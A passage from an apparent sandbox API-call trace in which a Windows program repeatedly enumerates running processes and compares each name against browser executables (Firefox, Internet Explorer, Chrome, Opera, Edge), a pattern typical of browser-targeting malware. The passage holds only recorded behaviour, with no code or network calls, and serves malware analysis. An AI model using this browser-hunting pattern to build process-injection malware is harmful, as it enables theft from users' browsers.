cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0259.165] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0259.165] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0259.165] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0259.165] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0259.165] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0259.165] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0259.166] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0259.166] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0259.166] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0259.166] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0259.166] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0259.166] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0259.166] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0259.166] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0259.166] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0259.166] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0259.166] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.166] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0259.167] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0259.167] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0259.167] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0259.167] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0259.167] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.167] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0259.167] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0259.168] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0259.168] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0259.168] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0259.168] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.168] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0259.168] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0259.168] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0259.168] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0259.168] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0259.168] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.168] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0259.169] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0259.169] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0259.169] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0259.169] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0259.169] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0259.169] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0259.169] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0259.169] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0259.169] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0259.169] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0259.169] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.169] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0259.170] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0259.170] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0259.170] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0259.170] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0259.170] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.170] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0259.170] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0259.170] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0259.170] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0259.170] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0259.170] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.171] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0259.171] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0259.171] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0259.171] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0259.171] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0259.171] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.171] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0259.172] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0259.172] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0259.172] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0259.172] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0259.172] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.172] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0259.172] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0259.172] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0259.172] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0259.172] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0259.172] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0259.172] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0259.173] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0259.173] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0259.173] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0259.173] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0259.173] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0259.173] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0259.173] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0259.173] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0259.173] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0259.173] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0259.174] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0259.174] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0259.174] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0259.174] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0259.174] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0259.174] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0259.174] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.174] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0259.175] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0259.175] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0259.175] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0259.175] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0259.175] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0259.175] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0259.175] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0259.175] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0259.175] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0259.175] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0259.175] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.175] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0259.176] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0259.176] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0259.176] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0259.176] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0259.176] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.176] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.176] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0259.176] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0259.176] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0259.176] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0259.176] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.176] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0259.177] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0259.177] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0259.177] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0259.177] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0259.177] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.177] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.177] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0259.177] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0259.178] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0259.178] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0259.178] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.178] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0259.178] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0259.178] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0259.178] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0259.178] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0259.178] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.178] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0259.179] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0259.179] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0259.179] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0259.179] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0259.179] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0259.179] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0259.179] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0259.179] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0259.179] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0259.179] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0259.179] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0259.179] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0259.180] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0259.180] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0259.180] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0259.180] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0259.180] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0259.180] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0259.180] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0259.180] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0259.180] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0259.180] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0259.180] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0259.180] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0259.181] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0259.181] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0259.181] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0259.181] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0259.181] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0259.181] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0259.182] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0259.182] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0259.182] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0259.182] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0259.182] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0259.182] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0259.182] CloseHandle (hObject=0xe8) returned 1 [0259.182] Sleep (dwMilliseconds=0x3e8) [0260.186] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0260.187] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0260.188] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0260.188] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0260.188] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0260.188] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0260.188] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0260.188] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0260.188] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0260.188] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0260.188] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0260.188] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0260.188] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0260.189] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0260.189] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0260.189] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0260.189] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0260.189] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0260.189] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0260.189] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0260.190] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0260.190] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0260.190] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0260.190] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0260.190] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0260.190] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0260.190] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0260.190] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0260.190] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0260.190] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0260.190] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0260.190] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0260.191] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0260.191] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0260.191] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0260.191] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0260.191] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0260.191] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0260.191] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0260.191] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0260.191] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0260.191] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0260.191] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0260.191] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, 